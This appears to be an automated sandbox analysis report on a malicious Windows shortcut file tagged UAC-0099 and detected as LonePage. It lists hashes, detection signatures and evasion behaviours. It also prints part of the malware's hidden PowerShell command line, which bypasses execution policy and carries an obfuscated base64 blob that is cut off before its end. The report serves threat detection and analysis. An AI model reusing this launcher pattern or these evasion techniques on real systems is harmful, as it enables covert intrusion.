Edit tour
Windows
Analysis Report
140AEcuVy7.lnk
Overview
General Information
Sample name: | 140AEcuVy7.lnkrenamed because original name is a hash value |
Original sample name: | 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk |
Analysis ID: | 1522697 |
MD5: | 64752d058e5829210a0f407fb912c9d3 |
SHA1: | 4e8a0cfb784a6f93f8974b4f11679786cef86bb7 |
SHA256: | 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51 |
Tags: | lnkUAC-0099user-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 6496 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -nop -noni -exec byp ass -c $te mp='JVBERi 0xLjQKJeLj z9MNCjEgMC BvYmoKPDwg Ci9DcmVhdG 9yIChDYW5v biBpUi1BRF YgNjU1NSAg UERGKQovQ3 JlYXRpb25E YXRlIChEOj IwMjMwMjEz MDg1OTU3Kz AxJzAwJykK L1Byb2R1Y2 VyIChcMzc2 XDM3N1wwMD BBXDAwMGRc MDAwb1wwMD BiXDAwMGVc MDAwIFwwMD BQXDAwMFNc MDAwTFwwMD AgXDAwMDFc MDAwLlwwMD BcCjNcMDAw ZVwwMDAgXD AwMGZcMDAw b1wwMDByXD AwMCBcMDAw Q1wwMDBhXD AwMG5cMDAw b1wwMDBuXD AwMFwwMDAp Cj4+IAplbm RvYmoKMiAw IG9iago8PC AKL1BhZ2Vz IDMgMCBSIA ovVHlwZSAv Q2F0YWxvZy AKL091dHB1 dEludGVudH MgMTIgMCBS IAovTWV0YW RhdGEgMTMg MCBSIAo+Pi AKZW5kb2Jq CjQgMCBvYm oKPDwgL1R5 cGUgL1hPYm plY3QgL1N1 YnR5cGUgL0 ltYWdlIC9X aWR0aCAxMj QwIC9IZWln aHQgMTc1My AvQml0c1Bl ckNvbXBvbm VudCA4IAov Q29sb3JTcG FjZSAvRGV2 aWNlR3JheS AvRmlsdGVy IFsgL0ZsYX RlRGVjb2Rl IC9EQ1REZW NvZGUgXSAv TGVuZ3RoID IxODgxID4+ IApzdHJlYW 0NCngB3D13 QFPX17Haaq mWWpO2ahVb pRAQqcpoUU kdiAGBJgGp qKRuEREXKk hIq3XFgYYA AiIatgqpGs QBpA5EUUSG oqCgIiAgIo RhyOA7970s QrTaX/vP1z 7Dy7vrrHvu Oeeed9N9v/ sx4TOnmdSZ hD4f9CFEwP +EbgXBcPrC 1f6rR1FXLy bAf90VhOmE fsOHjxo+as yoUWNszMeY 28ybZGMzad 6GP+ZNm/fH hviDv7PZvx +MLzqVG517 quh+bmdn7v 3KhhcNlYru bkV1d3VDwx PodTr09b9d 3X8RPhnw0Y N+9/v0GYzg 7EcgdF8lGB EIfT7sg/2n 6r7PB337ff hR/wEfG3wC FTI+I3zQp2 /fD/r1/fDD ftCmD6vPB3 0J/QZ/+Pk3 46d+NIS2sP +3a4kTfj94 bMDoaacuke hFr8ZMXLRu 68cGX3z51d Bhxt+ZmJLN rKxtbH/40W 76DIeZjrOo Tgx3jzmev8 z1Wrxk6bLl K3xWrt8QsH HT5sCgbX9s 37Fz124ON4 wXHhF5KCqa H5+QmJSckn r89BlhxtnM c+cvXL5yNf da3vUb+cUl pXfvld1/UP 7kafWzmtq6 5/UNLa3itv aOzteSLqBX uQqb/28NUJ o6VE2Hbip8 NUQocMSKTw OZlsVpbsPU VCpQ9eQTcj VOXMyUNqWq oCpVDUfDGi JSLwtVEtpK WfYgUTVmkl xNMVWXVdVq ekQztRueBD 5rwWipolq0 vRKGFFWvIA T+9xdrGC3S IqoShAo6a8 ffUNdF1V2y pups6UA2hq /oWmzHV2ri W96HmArOTI VV1Z/JmDxY sbarpMFooZ qrJTlqmVoB nVVhEp6gvk uUElUDhL0Y 301AkwET6j /z1BLqU6WN zw5K802YV5 mvSxTqnn3i NDXKPulY23 Hwy6hxhZab qqasX9CM6I ZaqOj2ogQx 8R5T+qJYvp tdh8gMbGHX Cas6gVGfAR lL2FXLwl5M V2xxgYGiN9 3Pk3XEwLSt OmWJ33QTYM opH4VKmmzl HT6iRUbiSn /okrWLXRgo ao537gBspt TCZIK5sRNv h8p8RM1nXK VAyiP4KIuV o/jf3ynrRK Moe3pejGpD T2ecO74BUi RBTwWWGlAM Jc22MG7INY oScNSlmF01 M/QUBlLbCm wQ9CTyBQxS AKgMs8drF8 X3eJJV1VmU qKrtsWPx92 6r+53+ftHU gevLs08rlx hTfk6gf7sA DM6Pe1qVnC cCSnU5u6u2 Kv/CZpSv5Y OUM9V7HmhO C1HjCc9U1R oRGNtNkAUV KJqCltpAFI EohJXKgegZ Mb2bYORJma GYme2qHuwt N1nxCuZO+V pKFynojRkp gTzwTZrYlf 7yfmUoZoJA ciB63m5SZH QTKgXHdF6N mG9RJ9viBt lcFRJPelxA yFbhiiQwnr lZxaXsdAge pnlHwSt3RG S4kmo3dRNa Gm2lGfW8ci cI+6zATDQ3 wdidCvv0kN 2yfUGxPdZe fOhen4EUmc iwq7qbcMZT uXPTqwrRM6 pQkVMmBxm6 4xK0VN1r8M uqRqa8oWtY Tw/ceE1ZXE sTRb7ev2bB ItbdLo8GMz tyacNCgQ3g HFHVflcUC5 3wyskQqPJZ IbASdRNC54 oeCZzBRAHL CQxqLicgcD 6lpT2gze2Z 713cCnj7p3 k+peY1u8xI Cnmod3MxQG jec9jVbeyy